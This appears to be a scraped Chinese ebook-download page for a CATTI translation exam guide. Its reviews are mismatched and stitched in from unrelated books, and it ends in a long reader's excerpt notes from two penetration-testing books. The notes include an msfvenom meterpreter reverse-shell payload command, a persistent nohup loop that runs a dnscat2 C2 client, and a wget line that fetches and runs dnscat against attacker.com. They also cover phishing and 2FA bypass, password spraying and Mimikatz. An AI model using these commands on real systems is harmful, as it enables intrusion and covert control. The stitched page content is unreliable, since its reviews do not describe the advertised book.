CATTI英语二级笔译实务：考试指南+强化训练（新版） 在线下载 pdf mobi 2025 epub 电子版

全国翻译专业资格（水平）考试（CATTI）是对参试人员口译或笔译方面的双语互译能力和水平进行评价与认定的一项职业资格考试，与职称直接挂钩。CATTI在2020年改革推出新版机考后，对考生的备考提出了更高的要求，而具有针对性的备考材料就成为考生的一大刚需。本书由“翻译国家队”、联合国长期语言服务供应商——中国对外翻译有限公司编著，适用于新版机考改革。编写人员从考生痛点出发，有针对性地进行了4大主题、常考笔译文本的精讲，旨在帮助考生顺利通过考试，取得证书。

暂无相关目录，正在全力查找中！

暂无相关内容，正在全力查找中

暂无出版社相关信息，正在全力查找中！

暂无相关书籍摘录，正在全力查找中！

在线阅读地址：CATTI英语二级笔译实务：考试指南+强化训练（新版）在线阅读

在线听书地址：CATTI英语二级笔译实务：考试指南+强化训练（新版）在线收听

在线购买地址：CATTI英语二级笔译实务：考试指南+强化训练（新版）在线购买

暂无原文赏析，正在全力查找中！

书籍介绍

全国翻译专业资格（水平）考试（CATTI）是对参试人员口译或笔译方面的双语互译能力和水平进行评价与认定的一项职业资格考试，与职称直接挂钩。CATTI在2020年改革推出新版机考后，对考生的备考提出了更高的要求，而具有针对性的备考材料就成为考生的一大刚需。本书由“翻译国家队”、联合国长期语言服务供应商——中国对外翻译有限公司编著，适用于新版机考改革。编写人员从考生痛点出发，有针对性地进行了4大主题、常考笔译文本的精讲，旨在帮助考生顺利通过考试，取得证书。

• 作者：j_haven 发布时间：2016-06-01 15:07:16

  心灵

• 作者：travelight 发布时间：2009-10-19 17:40:09

  看到一个也食人间烟火的贝多芬

• 作者：柳无码 发布时间：2014-04-12 22:12:40

  薄薄一本就小30，但我还是觉得很值啊。妙趣尽在细节中，很适合小朋友，小朋友看绘本要比大人细心得多。

• 作者：阅读记录细胞 发布时间：2019-06-30 16:25:41

  可以浓缩成ppt的小册子

• 作者：玻璃柔术街 发布时间：2013-10-30 23:39:11

  现当代文学史必研究的作品，但个人觉得文学性不强。今天才和朋友谈起，还好柳青没有把他的四部书写完，不然我们就悲催了。

• 作者：一瓢之饮 发布时间：2017-07-20 10:50:26

  啊，我好像很久没标注过书了。这个书是我最近两年看到最震撼的书了。

• 看完了nodejs才回过头再看感觉收获大些

  作者：magic.xie 发布时间：2012-09-20 22:02:52

  如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题如题

• 红队选手很好的入门书籍

  作者：mengbo 发布时间：2020-10-10 10:18:13

  对于红队来说知识点覆盖相当全面了，特别是各种工具，都有简单的介绍。看的时候发现我对微软的系统真是一窍不通啊，这个短板只能有机会再说吧。

  导图 ">

  ## 导图

  

  《渗透测试实战第二版》 思维导图

  

  《渗透测试实战第三版》 思维导图

  摘抄 ">

  ## 摘抄

  ###《渗透测试实战第二版》

  P26已经有大量不同类型网站，帮助开始学习二进制漏洞基础知识。一个非常好的学习网站是 Over the Wire （

  http://overthewire.org/wargames/narnia/

  ）。Over the Wire 网站是一个在线夺旗挑战站点，专注于从二进制攻击到网站攻击所有方面的知识。

  P86使用通用配置命令运行 Metasploit

  help：提供帮助文档！

  search [string]：通过 CVE、标签和应用程序等査找漏洞。

  use [module]：选择模块。

  info：显示选定模块的信息。

  show options：显示模块设置参数。

  set and setg：设置选项中的变量值。使用 setg 设置全局变量值。如果需要在模块和漏洞直接切换，并且不想每次都输入 IP 地址（或其他输入），就建议使用 setg。

  对于远程溢出漏洞，在选项中可能看不到 PAYLOAD 参数，但是始终可以通过 setPAYLOAD [输入 tab 键多次进行选择适当参数]，设置该参数。

  设置定制的净荷：set EXE::Custom [file]。

  exploit -j：后台激活模块实现监听功能。

  P87 运行 Metasploit-一漏洞利用后续操作或其他

  sessions -K：关闭所有会话。

  background：将 Meterpreter shell 调入主界面，保持当前会话在后台运行。

  运行资源文件。.rc 脚本自动化处理（更多信息见本书的 9.3 节）：msfconsole -r resource.rc

  P136另外一个经常使用的资源是 OWASP Evasion 备忘录。在渗透测试时，一旦遇到编码问题，首先要查的就是它。这个表的下载网址是：h

  ttps://owasp.org/www-community/xss-filter-evasion-cheatsheet。

  批注：有人翻译了中文版

  P136测试这种问题有很多种复杂的方法，但是最简单的一种是通过流量代理的方法进行手动测试。按照转账的流程，按照上面描述的过程进行一次转账，然后检査是否可以重放。当时，重放攻击中，目标是能够取得相同效果的，但是不需要进行所有的步骤。如果是这样，就证实存在 CSRF 漏洞。

  P297 searchsploit找到的所有漏洞利用程序实际存储在文件夹 /usr/share/exploits/ 下。

  P324 Cobalt 基于 Metasploit 框架，具有攻击、中转、规避杀毒软件检测、持续控制等功能，最重要的是提供定制的净荷（比如 Beacon）。

  ###《渗透测试实战第三版》

  - 位置 #657-658

  由 MITRE 公司提出的 ATT&CK 矩阵( Adversarial Tactics, Techniques, and Common Knowledge matrix ) 是对 APT 攻击的详细分解。这个矩阵中是一个在各种攻击场景中使用的不同 TTP（Tactics、Techniques & Procedures）的大集合。

  - 位置 #673-674

  面对安全问题，企业的正确态度是从一开始就应该预设自己已经被攻破了。

  - 位置 #718-719

  搭建服务器的一个快速方法是集成 TrustedSec 公司的渗透测试框架 (

  PTF

  )。

  - 位置 #747-749

  Red Baron

  是 Terraform 的一组模块和自定义/第三方提供者，它可以为红队自动创建弹性、一次性、安全和灵活的基础设施。无论你想要构建一个钓鱼服务器，Cobalt Strike 基础设施，或创建 DNS C2 服务器，你都可以用 Terraform 做到这一切。

  - 位置 #769-771

  使用 PowerShell 进行模糊处理：

  msfvenom -payload windows/x64/meterpreter_reverse_http -format psh -out meterpreter-64.ps1 LHOST=127.0.0.1

  - 位置 #853-854

  Empire 是一个后期漏洞利用的框架，包含一个纯 PowerShell2.0 的 Windows 代理和一个纯 Python 2.6/2.7 的 Linux/OS X 代理。

  - 位置 #915-916

  如果你尚未在 Kali 图形界面上安装 PowerShell，那么最好的方法是手动安装它。

  - 位置 #923-925

  dnscat2 就是一款利用 DNS 协议创建加密 C2 隧道来控制服务器的工具，所以说这种隧道几乎在每个网络中都可以使用.

  - 位置 #974-975

  我通常喜欢使用快速 bash 脚本启动我的 dnscat payload：

  nohup /bin/bash -c “while true; do /opt/dnscat2/client/dnscat loca1host.com -secret 9dfj3hdsfajh37e8c902j -max-retransmits 5; sleep 3600; done” > /dev/null 2>&1 &

  - 位置 #1003-1003

  我们有很多时候想要将来自攻击服务器的流量通过我们的受感染主机传递到其他内部服务器。使用 dnscat2 执行此操作的最安全方法是通过本地端口转发我们的流量，然后将流量通过隧道传输到内部网络上的其他机器上。我们可以通过命令会话中的以下命令来完成此示例：

  listen 127.0.0.1:9999 10.100.100.1:22

  - 位置 #1083-1084

  每天用默认的端口运行 nmap，然后使用 ndiff 比较结果。

  - 位置 #1088-1089

  Masscan 对我们最初的侦察很有用，但通常不用于比较差异。

  - 位置 #1148-1149

  Censys.io 持续监控 Internet 上的每一台可访问的服务器和设备，以便你可以实时搜索和分析它们。

  - 位置 #1943-1945

  可以在这里找到 Hans-Michael 完整的演练示例和代码：

  https://github.com/Varbaek/xsser

  。 Hans-Michael 提供了一些关于重建 XSS 到 RCE 攻击的精彩示例和视频。

  - 位置 #2224-2226

  有一个类似 SQLmap 的名为 Tplmap 的工具，它可以尝试模板注入的所有不同组合。

  - 位置 #2239-2240

  可以在此处找到不同类型的 webshell payload 的绝佳列表：

  https://github.com/tennc/webshell

  - 位置 #2519-2520

  信息收集阶段，我们发现并识别了大量的电子邮箱地址和用户名帐号，我们将对这些获取到的信息进行一种叫“密码喷洒”（Password Spraying）的攻击。

  - 位置 #2525-2526

  密码爆破是用多个密码尝试破解同一个 ID。而密码喷洒攻击，是用一个密码来尝试多个用户 ID，以便至少有一个用户 ID 被泄露。

  - 位置 #2542-2544

  有很多工具可以实现密码喷洒攻击，但是，我们只关注其中的几个。第一个是来自 Spiderlabs 的名为 Spray 的工具。

  - 位置 #2789-2791

  我们可以在一个名为

  RTFM.py

  的工具中轻松搜索到这些命令，这是 @leostat 基于 RTFM 书籍(很棒的资源)创建的一个快速查询的 Python 脚本，其中包含大量这些方便的命令。

  - 位置 #2853-2857

  我们可以在受害者系统上使用系统默认自带的命令来查看安装了哪些系统补丁包。Windows 自带默认命令systeminfo 将提取任何给定的 Windows 主机的所有补丁安装历史记录。我们可以拿回这个输出结果，将其复制到我们的 Kali 系统并运行 Windows Exploit Suggester 以查找已知的漏洞然后针对性的进行漏洞利用从而提升权限。

  - 位置 #2874-2876

  测试并尝试不同类型的权限升级漏洞的最佳实验环境是 Rapid7的 Metasploitable3。

  - 位置 #2910-2911

  Mimikatz 自推出以来，就改变了在渗透入侵中获取明文密码的方式。

  - 位置 #2980-2982

  有多个渗透攻击框架的 payload 支持 Mac，我最喜欢的是使用 Empire。Empire 可以生成多个 payload 来诱骗受害者执行我们的代理，其中包括 Ducky scripts、二进制可执行程序、Office 宏、Safari 启动程序、pkg 安装包等等。

  - 位置 #3437-3438

  我们可以利用默认的 SSH 客户机，使用本地端口转发（-L）。

  - 位置 #3484-3484

  在我们进行任何类型的权限提升攻击之前，我首先要在 Linux 主机上进行一个良好的信息收集工作，并识别所有关于系统的信息。这包括用户、服务、定时任务、软件版本、弱信任对象、错误配置的文件权限，甚至是 Docker 信息。我们可以使用一个名为 LinEnum 的工具来为我们完成所有的累活（

  https://github.com/rebootuser/linenum

  ）。

  - 位置 #3491-3492

  运行一个名为 linux-exploit-suggester 的工具来分析主机系统并识别缺失的补丁和漏洞。

  - 位置 #3574-3578

  我们需要在 Web 服务器上放上我们的 payload，这样我们就可以让我们的 metasploit payload 抓取 dnscat 恶意软件。在 dnscat2 客户机文件夹中是 dnscat 二进制文件。

  ...

  set CMD wget http:///dnscat -O /tmp/dnscat && chmod+x /tmp/dnscat && /tmp/dnscat --dns server=attacker.com，port=53 --secret=

  run

  - 位置 #3710-3711

  快速克隆Web应用程序登录验证页的最佳工具之一是 TrustedSec 公司开发的社会工程学工具包（Social Engineering Toolkit，简称 SET）。

  - 位置 #3736-3736

  当受害者在我们的钓鱼网页上输入登陆凭证时，ReelPhish 允许红队利用 Selenium 和 Chrome 来自动触发双因素验证。

  - 位置 #4007-4009

  LAN Turtle 的目的是取代 dropbox（一款可以同步本地文件的网络存储在线网盘应用）。尽管它带有许多其他功能和应用程序工具，如自动连接 SSH、DNS 欺骗、meterpreter、ptunnel、script2email、urlsnarf、responder 等等，但红队使用的主要功能是“使用 LAN Turtle 获得进入网络的权限”。

  - 位置 #4162-4163

  Bash Bunny 是 Rubber Ducky 的升级版本。

  - 位置 #4992-4993

  通过 Invoke-Obfuscation 混淆框架，我们可以使用以下几种不同的技术对这个字符串进行深度混淆。